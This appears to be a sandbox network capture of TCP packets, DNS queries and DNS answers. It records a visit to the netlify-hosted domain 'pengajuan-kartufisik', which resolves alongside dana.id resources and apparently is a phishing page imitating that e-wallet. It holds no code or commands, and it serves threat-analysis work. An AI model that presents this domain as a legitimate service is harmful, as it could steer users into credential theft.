      Sep 27, 2024 04:26:43.731678009 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.731692076 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.731731892 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.734611034 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.734621048 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.734683990 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.740015030 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.740021944 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.740235090 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.740273952 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.740309954 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.743805885 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.743899107 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.753920078 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.754002094 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.758234024 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.758296967 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.819545984 CEST44349747184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:43.819591045 CEST44349747184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:43.819698095 CEST49747443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:43.822500944 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.822561026 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.822635889 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.822700024 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.835046053 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.835110903 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.836582899 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.836673975 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.836744070 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.836800098 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.844724894 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.844793081 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.845093012 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.845149994 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.849385023 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.849435091 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.849441051 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.849529028 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:43.849704027 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.863153934 CEST443497433.72.140.173192.168.2.6
      Sep 27, 2024 04:26:43.863353014 CEST443497433.72.140.173192.168.2.6
      Sep 27, 2024 04:26:43.863420963 CEST49743443192.168.2.63.72.140.173
      Sep 27, 2024 04:26:43.989859104 CEST49747443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:43.989886999 CEST44349747184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:43.989900112 CEST49747443192.168.2.6184.28.90.27
      Sep 27, 2024 04:26:43.989907026 CEST44349747184.28.90.27192.168.2.6
      Sep 27, 2024 04:26:43.999737978 CEST49742443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:43.999754906 CEST44349742162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:44.001991987 CEST49740443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:44.001996040 CEST44349740162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:44.002346992 CEST49743443192.168.2.63.72.140.173
      Sep 27, 2024 04:26:44.002372026 CEST443497433.72.140.173192.168.2.6
      Sep 27, 2024 04:26:44.003540993 CEST49741443192.168.2.6162.19.58.156
      Sep 27, 2024 04:26:44.003551960 CEST44349741162.19.58.156192.168.2.6
      Sep 27, 2024 04:26:49.849912882 CEST5890953192.168.2.61.1.1.1
      Sep 27, 2024 04:26:49.854801893 CEST53589091.1.1.1192.168.2.6
      Sep 27, 2024 04:26:49.854906082 CEST5890953192.168.2.61.1.1.1
      Sep 27, 2024 04:26:49.854963064 CEST5890953192.168.2.61.1.1.1
      Sep 27, 2024 04:26:49.859932899 CEST53589091.1.1.1192.168.2.6
      Sep 27, 2024 04:26:49.922288895 CEST44349730172.217.18.4192.168.2.6
      Sep 27, 2024 04:26:49.922364950 CEST44349730172.217.18.4192.168.2.6
      Sep 27, 2024 04:26:49.922703028 CEST49730443192.168.2.6172.217.18.4
      Sep 27, 2024 04:26:50.300228119 CEST53589091.1.1.1192.168.2.6
      Sep 27, 2024 04:26:50.304620028 CEST5890953192.168.2.61.1.1.1
      Sep 27, 2024 04:26:50.309912920 CEST53589091.1.1.1192.168.2.6
      Sep 27, 2024 04:26:50.309999943 CEST5890953192.168.2.61.1.1.1
      Sep 27, 2024 04:26:51.219516993 CEST49730443192.168.2.6172.217.18.4
      Sep 27, 2024 04:26:51.219544888 CEST44349730172.217.18.4192.168.2.6
      Sep 27, 2024 04:26:55.158523083 CEST44349732188.114.96.3192.168.2.6
      Sep 27, 2024 04:26:55.158595085 CEST44349732188.114.96.3192.168.2.6
      Sep 27, 2024 04:26:55.158759117 CEST49732443192.168.2.6188.114.96.3
      Sep 27, 2024 04:26:55.302026033 CEST49732443192.168.2.6188.114.96.3
      Sep 27, 2024 04:26:55.302061081 CEST44349732188.114.96.3192.168.2.6
      Sep 27, 2024 04:27:07.083163023 CEST804970552.58.254.253192.168.2.6
      Sep 27, 2024 04:27:07.083265066 CEST4970580192.168.2.652.58.254.253
      Sep 27, 2024 04:27:07.214282990 CEST4970580192.168.2.652.58.254.253
      Sep 27, 2024 04:27:07.219141960 CEST804970552.58.254.253192.168.2.6
      Sep 27, 2024 04:27:09.266807079 CEST44349721108.138.26.27192.168.2.6
      Sep 27, 2024 04:27:09.266891956 CEST44349721108.138.26.27192.168.2.6
      Sep 27, 2024 04:27:09.266947031 CEST49721443192.168.2.6108.138.26.27
      Sep 27, 2024 04:27:09.289664984 CEST4434971865.9.66.56192.168.2.6
      Sep 27, 2024 04:27:09.289737940 CEST4434971865.9.66.56192.168.2.6
      Sep 27, 2024 04:27:09.289849997 CEST49718443192.168.2.665.9.66.56
      Sep 27, 2024 04:27:11.254430056 CEST49721443192.168.2.6108.138.26.27
      Sep 27, 2024 04:27:11.254487038 CEST44349721108.138.26.27192.168.2.6
      Sep 27, 2024 04:27:11.254492044 CEST49718443192.168.2.665.9.66.56
      Sep 27, 2024 04:27:11.254523039 CEST4434971865.9.66.56192.168.2.6
      Sep 27, 2024 04:27:24.837403059 CEST49728443192.168.2.635.186.247.156
      Sep 27, 2024 04:27:24.837428093 CEST4434972835.186.247.156192.168.2.6
      Sep 27, 2024 04:27:25.163472891 CEST49729443192.168.2.6142.250.184.206
      Sep 27, 2024 04:27:25.163506985 CEST44349729142.250.184.206192.168.2.6
      Sep 27, 2024 04:27:39.361332893 CEST58912443192.168.2.6172.217.18.4
      Sep 27, 2024 04:27:39.361370087 CEST44358912172.217.18.4192.168.2.6
      Sep 27, 2024 04:27:39.361430883 CEST58912443192.168.2.6172.217.18.4
      Sep 27, 2024 04:27:39.361767054 CEST58912443192.168.2.6172.217.18.4
      Sep 27, 2024 04:27:39.361783028 CEST44358912172.217.18.4192.168.2.6
      Sep 27, 2024 04:27:40.014759064 CEST44358912172.217.18.4192.168.2.6
      Sep 27, 2024 04:27:40.015209913 CEST58912443192.168.2.6172.217.18.4
      Sep 27, 2024 04:27:40.015229940 CEST44358912172.217.18.4192.168.2.6
      Sep 27, 2024 04:27:40.015703917 CEST44358912172.217.18.4192.168.2.6
      Sep 27, 2024 04:27:40.016872883 CEST58912443192.168.2.6172.217.18.4
      Sep 27, 2024 04:27:40.016967058 CEST44358912172.217.18.4192.168.2.6
      Sep 27, 2024 04:27:40.058003902 CEST58912443192.168.2.6172.217.18.4
      Sep 27, 2024 04:27:41.214060068 CEST49728443192.168.2.635.186.247.156
      Sep 27, 2024 04:27:41.214175940 CEST4434972835.186.247.156192.168.2.6
      Sep 27, 2024 04:27:41.214361906 CEST49728443192.168.2.635.186.247.156
      Sep 27, 2024 04:27:41.214369059 CEST4434972835.186.247.156192.168.2.6
      Sep 27, 2024 04:27:41.214457989 CEST49729443192.168.2.6142.250.184.206
      Sep 27, 2024 04:27:41.214478016 CEST49728443192.168.2.635.186.247.156
      Sep 27, 2024 04:27:41.214610100 CEST44349729142.250.184.206192.168.2.6
      Sep 27, 2024 04:27:41.214668989 CEST49729443192.168.2.6142.250.184.206
      Sep 27, 2024 04:27:49.927395105 CEST44358912172.217.18.4192.168.2.6
      Sep 27, 2024 04:27:49.927469969 CEST44358912172.217.18.4192.168.2.6
      Sep 27, 2024 04:27:49.927567005 CEST58912443192.168.2.6172.217.18.4
      Sep 27, 2024 04:27:51.217675924 CEST58912443192.168.2.6172.217.18.4
      Sep 27, 2024 04:27:51.217700005 CEST44358912172.217.18.4192.168.2.6
      TimestampSource PortDest PortSource IPDest IP
      Sep 27, 2024 04:26:34.793612957 CEST53504601.1.1.1192.168.2.6
      Sep 27, 2024 04:26:34.794581890 CEST53497721.1.1.1192.168.2.6
      Sep 27, 2024 04:26:35.996520996 CEST53572311.1.1.1192.168.2.6
      Sep 27, 2024 04:26:36.432308912 CEST5604053192.168.2.61.1.1.1
      Sep 27, 2024 04:26:36.432460070 CEST6084053192.168.2.61.1.1.1
      Sep 27, 2024 04:26:36.441267014 CEST53560401.1.1.1192.168.2.6
      Sep 27, 2024 04:26:36.441322088 CEST53608401.1.1.1192.168.2.6
      Sep 27, 2024 04:26:37.085529089 CEST5695153192.168.2.61.1.1.1
      Sep 27, 2024 04:26:37.085614920 CEST5814353192.168.2.61.1.1.1
      Sep 27, 2024 04:26:37.093858957 CEST53581431.1.1.1192.168.2.6
      Sep 27, 2024 04:26:37.094110012 CEST53569511.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.656709909 CEST5148453192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.657090902 CEST5910853192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.658225060 CEST6451153192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.658225060 CEST5880653192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.659274101 CEST5577453192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.659940004 CEST6145853192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.663876057 CEST6311553192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.665105104 CEST53645111.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.665604115 CEST53588061.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.665837049 CEST53557741.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.667263031 CEST53614581.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.669225931 CEST5119753192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.669431925 CEST6070353192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.670312881 CEST5640653192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.670312881 CEST6013053192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.670666933 CEST53631151.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.670978069 CEST5504553192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.675856113 CEST53607031.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.677232981 CEST53564061.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.677308083 CEST53601301.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.677439928 CEST53550451.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.677789927 CEST53511971.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.702367067 CEST6184353192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.702848911 CEST5064053192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.707865953 CEST53497001.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.708837032 CEST53618431.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.710007906 CEST53506401.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.715130091 CEST53601051.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.716300011 CEST5436653192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.716300011 CEST5656553192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.722956896 CEST53543661.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.723270893 CEST53565651.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.738507986 CEST5997553192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.738851070 CEST6478753192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.739543915 CEST6352153192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.739722013 CEST5189453192.168.2.61.1.1.1
      Sep 27, 2024 04:26:38.746319056 CEST53635211.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.746550083 CEST53518941.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.747257948 CEST53647871.1.1.1192.168.2.6
      Sep 27, 2024 04:26:38.747299910 CEST53599751.1.1.1192.168.2.6
      Sep 27, 2024 04:26:39.307065964 CEST5501253192.168.2.61.1.1.1
      Sep 27, 2024 04:26:39.309725046 CEST5763053192.168.2.61.1.1.1
      Sep 27, 2024 04:26:39.313868046 CEST53550121.1.1.1192.168.2.6
      Sep 27, 2024 04:26:39.315939903 CEST4987853192.168.2.61.1.1.1
      Sep 27, 2024 04:26:39.316499949 CEST6493753192.168.2.61.1.1.1
      Sep 27, 2024 04:26:39.318038940 CEST53576301.1.1.1192.168.2.6
      Sep 27, 2024 04:26:39.322720051 CEST53498781.1.1.1192.168.2.6
      Sep 27, 2024 04:26:39.322911024 CEST53649371.1.1.1192.168.2.6
      Sep 27, 2024 04:26:42.561295986 CEST6457753192.168.2.61.1.1.1
      Sep 27, 2024 04:26:42.561968088 CEST5079053192.168.2.61.1.1.1
      Sep 27, 2024 04:26:42.573139906 CEST53507901.1.1.1192.168.2.6
      Sep 27, 2024 04:26:42.674922943 CEST6337053192.168.2.61.1.1.1
      Sep 27, 2024 04:26:42.675445080 CEST6506553192.168.2.61.1.1.1
      Sep 27, 2024 04:26:42.677057028 CEST5838953192.168.2.61.1.1.1
      Sep 27, 2024 04:26:42.677642107 CEST5336453192.168.2.61.1.1.1
      Sep 27, 2024 04:26:42.682080030 CEST53650651.1.1.1192.168.2.6
      Sep 27, 2024 04:26:42.683540106 CEST53583891.1.1.1192.168.2.6
      Sep 27, 2024 04:26:42.684350967 CEST53533641.1.1.1192.168.2.6
      Sep 27, 2024 04:26:42.685621023 CEST4953753192.168.2.61.1.1.1
      Sep 27, 2024 04:26:42.685970068 CEST4996853192.168.2.61.1.1.1
      Sep 27, 2024 04:26:42.692734003 CEST53495371.1.1.1192.168.2.6
      Sep 27, 2024 04:26:42.693128109 CEST53499681.1.1.1192.168.2.6
      Sep 27, 2024 04:26:42.747487068 CEST5253053192.168.2.61.1.1.1
      Sep 27, 2024 04:26:42.748038054 CEST6189753192.168.2.61.1.1.1
      Sep 27, 2024 04:26:42.750073910 CEST5667653192.168.2.61.1.1.1
      Sep 27, 2024 04:26:42.750458956 CEST5081153192.168.2.61.1.1.1
      Sep 27, 2024 04:26:42.755961895 CEST53525301.1.1.1192.168.2.6
      Sep 27, 2024 04:26:42.756454945 CEST53618971.1.1.1192.168.2.6
      Sep 27, 2024 04:26:42.760562897 CEST53528821.1.1.1192.168.2.6
      Sep 27, 2024 04:26:49.849315882 CEST53572101.1.1.1192.168.2.6
      Sep 27, 2024 04:26:53.236143112 CEST53500981.1.1.1192.168.2.6
      Sep 27, 2024 04:27:12.179358959 CEST53540551.1.1.1192.168.2.6
      Sep 27, 2024 04:27:34.475929022 CEST53617751.1.1.1192.168.2.6
      Sep 27, 2024 04:27:35.224658012 CEST53497061.1.1.1192.168.2.6
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Sep 27, 2024 04:26:36.432308912 CEST192.168.2.61.1.1.10x5d2aStandard query (0)pengajuan-kartufisik.netlify.appA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:36.432460070 CEST192.168.2.61.1.1.10x47caStandard query (0)pengajuan-kartufisik.netlify.app65IN (0x0001)false
      Sep 27, 2024 04:26:37.085529089 CEST192.168.2.61.1.1.10x9b15Standard query (0)pengajuan-kartufisik.netlify.appA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:37.085614920 CEST192.168.2.61.1.1.10x62d1Standard query (0)pengajuan-kartufisik.netlify.app65IN (0x0001)false
      Sep 27, 2024 04:26:38.656709909 CEST192.168.2.61.1.1.10xcf1fStandard query (0)a.m.dana.idA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.657090902 CEST192.168.2.61.1.1.10x64cdStandard query (0)a.m.dana.id65IN (0x0001)false
      Sep 27, 2024 04:26:38.658225060 CEST192.168.2.61.1.1.10x9184Standard query (0)app.linkA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.658225060 CEST192.168.2.61.1.1.10x6924Standard query (0)app.link65IN (0x0001)false
      Sep 27, 2024 04:26:38.659274101 CEST192.168.2.61.1.1.10xe06dStandard query (0)api2.branch.ioA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.659940004 CEST192.168.2.61.1.1.10xbb86Standard query (0)api2.branch.io65IN (0x0001)false
      Sep 27, 2024 04:26:38.663876057 CEST192.168.2.61.1.1.10xc340Standard query (0)code.ionicframework.comA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.669225931 CEST192.168.2.61.1.1.10x88feStandard query (0)code.ionicframework.com65IN (0x0001)false
      Sep 27, 2024 04:26:38.669431925 CEST192.168.2.61.1.1.10xca77Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.670312881 CEST192.168.2.61.1.1.10x9e1bStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.670312881 CEST192.168.2.61.1.1.10x2e18Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
      Sep 27, 2024 04:26:38.670978069 CEST192.168.2.61.1.1.10x5fc2Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
      Sep 27, 2024 04:26:38.702367067 CEST192.168.2.61.1.1.10xc6daStandard query (0)i.ibb.coA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.702848911 CEST192.168.2.61.1.1.10xb679Standard query (0)i.ibb.co65IN (0x0001)false
      Sep 27, 2024 04:26:38.716300011 CEST192.168.2.61.1.1.10x57a1Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.716300011 CEST192.168.2.61.1.1.10xd4f5Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
      Sep 27, 2024 04:26:38.738507986 CEST192.168.2.61.1.1.10x27b4Standard query (0)cdn.lr-ingest.ioA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.738851070 CEST192.168.2.61.1.1.10x437dStandard query (0)cdn.lr-ingest.io65IN (0x0001)false
      Sep 27, 2024 04:26:38.739543915 CEST192.168.2.61.1.1.10xea5Standard query (0)sentry.ioA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.739722013 CEST192.168.2.61.1.1.10x6d60Standard query (0)sentry.io65IN (0x0001)false
      Sep 27, 2024 04:26:39.307065964 CEST192.168.2.61.1.1.10xbf6dStandard query (0)youtube.comA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:39.309725046 CEST192.168.2.61.1.1.10x50beStandard query (0)youtube.com65IN (0x0001)false
      Sep 27, 2024 04:26:39.315939903 CEST192.168.2.61.1.1.10xc66bStandard query (0)www.google.comA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:39.316499949 CEST192.168.2.61.1.1.10xb7ebStandard query (0)www.google.com65IN (0x0001)false
      Sep 27, 2024 04:26:42.561295986 CEST192.168.2.61.1.1.10xdc7fStandard query (0)www.dana.idA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.561968088 CEST192.168.2.61.1.1.10xb422Standard query (0)www.dana.id65IN (0x0001)false
      Sep 27, 2024 04:26:42.674922943 CEST192.168.2.61.1.1.10x7eaaStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.675445080 CEST192.168.2.61.1.1.10xf688Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
      Sep 27, 2024 04:26:42.677057028 CEST192.168.2.61.1.1.10xa584Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.677642107 CEST192.168.2.61.1.1.10xdbffStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
      Sep 27, 2024 04:26:42.685621023 CEST192.168.2.61.1.1.10xbce9Standard query (0)i.ibb.coA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.685970068 CEST192.168.2.61.1.1.10x2f7cStandard query (0)i.ibb.co65IN (0x0001)false
      Sep 27, 2024 04:26:42.747487068 CEST192.168.2.61.1.1.10xbca8Standard query (0)pengajuan-kartufisik.netlify.appA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.748038054 CEST192.168.2.61.1.1.10x756dStandard query (0)pengajuan-kartufisik.netlify.app65IN (0x0001)false
      Sep 27, 2024 04:26:42.750073910 CEST192.168.2.61.1.1.10x9f0aStandard query (0)a.m.dana.idA (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:42.750458956 CEST192.168.2.61.1.1.10x8096Standard query (0)a.m.dana.id65IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Sep 27, 2024 04:26:36.441267014 CEST1.1.1.1192.168.2.60x5d2aNo error (0)pengajuan-kartufisik.netlify.app52.58.254.253A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:36.441267014 CEST1.1.1.1192.168.2.60x5d2aNo error (0)pengajuan-kartufisik.netlify.app35.156.224.161A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:37.094110012 CEST1.1.1.1192.168.2.60x9b15No error (0)pengajuan-kartufisik.netlify.app3.70.101.28A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:37.094110012 CEST1.1.1.1192.168.2.60x9b15No error (0)pengajuan-kartufisik.netlify.app18.192.94.96A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.665105104 CEST1.1.1.1192.168.2.60x9184No error (0)app.link65.9.66.56A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.665105104 CEST1.1.1.1192.168.2.60x9184No error (0)app.link65.9.66.103A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.665105104 CEST1.1.1.1192.168.2.60x9184No error (0)app.link65.9.66.129A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.665105104 CEST1.1.1.1192.168.2.60x9184No error (0)app.link65.9.66.31A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.665837049 CEST1.1.1.1192.168.2.60xe06dNo error (0)api2.branch.io108.138.26.27A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.665837049 CEST1.1.1.1192.168.2.60xe06dNo error (0)api2.branch.io108.138.26.116A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.665837049 CEST1.1.1.1192.168.2.60xe06dNo error (0)api2.branch.io108.138.26.129A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.665837049 CEST1.1.1.1192.168.2.60xe06dNo error (0)api2.branch.io108.138.26.118A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.667169094 CEST1.1.1.1192.168.2.60x64cdNo error (0)a.m.dana.ida.m.dana.id.edgesuite.netCNAME (Canonical name)IN (0x0001)false
      Sep 27, 2024 04:26:38.667233944 CEST1.1.1.1192.168.2.60xcf1fNo error (0)a.m.dana.ida.m.dana.id.edgesuite.netCNAME (Canonical name)IN (0x0001)false
      Sep 27, 2024 04:26:38.670666933 CEST1.1.1.1192.168.2.60xc340No error (0)code.ionicframework.com172.67.69.29A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.670666933 CEST1.1.1.1192.168.2.60xc340No error (0)code.ionicframework.com104.26.7.173A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.670666933 CEST1.1.1.1192.168.2.60xc340No error (0)code.ionicframework.com104.26.6.173A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.675856113 CEST1.1.1.1192.168.2.60xca77No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.675856113 CEST1.1.1.1192.168.2.60xca77No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.677232981 CEST1.1.1.1192.168.2.60x9e1bNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
      Sep 27, 2024 04:26:38.677232981 CEST1.1.1.1192.168.2.60x9e1bNo error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.677232981 CEST1.1.1.1192.168.2.60x9e1bNo error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.677232981 CEST1.1.1.1192.168.2.60x9e1bNo error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.677232981 CEST1.1.1.1192.168.2.60x9e1bNo error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.677308083 CEST1.1.1.1192.168.2.60x2e18No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
      Sep 27, 2024 04:26:38.677439928 CEST1.1.1.1192.168.2.60x5fc2No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
      Sep 27, 2024 04:26:38.677789927 CEST1.1.1.1192.168.2.60x88feNo error (0)code.ionicframework.com65IN (0x0001)false
      Sep 27, 2024 04:26:38.708837032 CEST1.1.1.1192.168.2.60xc6daNo error (0)i.ibb.co162.19.58.161A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.708837032 CEST1.1.1.1192.168.2.60xc6daNo error (0)i.ibb.co162.19.58.158A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.708837032 CEST1.1.1.1192.168.2.60xc6daNo error (0)i.ibb.co162.19.58.159A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.708837032 CEST1.1.1.1192.168.2.60xc6daNo error (0)i.ibb.co162.19.58.156A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.708837032 CEST1.1.1.1192.168.2.60xc6daNo error (0)i.ibb.co162.19.58.160A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.708837032 CEST1.1.1.1192.168.2.60xc6daNo error (0)i.ibb.co162.19.58.157A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.722956896 CEST1.1.1.1192.168.2.60x57a1No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.722956896 CEST1.1.1.1192.168.2.60x57a1No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.723270893 CEST1.1.1.1192.168.2.60xd4f5No error (0)cdnjs.cloudflare.com65IN (0x0001)false
      Sep 27, 2024 04:26:38.746319056 CEST1.1.1.1192.168.2.60xea5No error (0)sentry.io35.186.247.156A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.747257948 CEST1.1.1.1192.168.2.60x437dNo error (0)cdn.lr-ingest.io65IN (0x0001)false
      Sep 27, 2024 04:26:38.747299910 CEST1.1.1.1192.168.2.60x27b4No error (0)cdn.lr-ingest.io188.114.96.3A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:38.747299910 CEST1.1.1.1192.168.2.60x27b4No error (0)cdn.lr-ingest.io188.114.97.3A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:39.313868046 CEST1.1.1.1192.168.2.60xbf6dNo error (0)youtube.com142.250.184.206A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:39.318038940 CEST1.1.1.1192.168.2.60x50beNo error (0)youtube.com65IN (0x0001)false
      Sep 27, 2024 04:26:39.322720051 CEST1.1.1.1192.168.2.60xc66bNo error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
      Sep 27, 2024 04:26:39.322911024 CEST1.1.1.1192.168.2.60xb7ebNo error (0)www.google.com65IN (0x0001)false
      Sep 27, 2024 04:26:42.573139906 CEST1.1.1.1192.168.2.60xb422No error (0)www.dana.idwww.dana.id.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
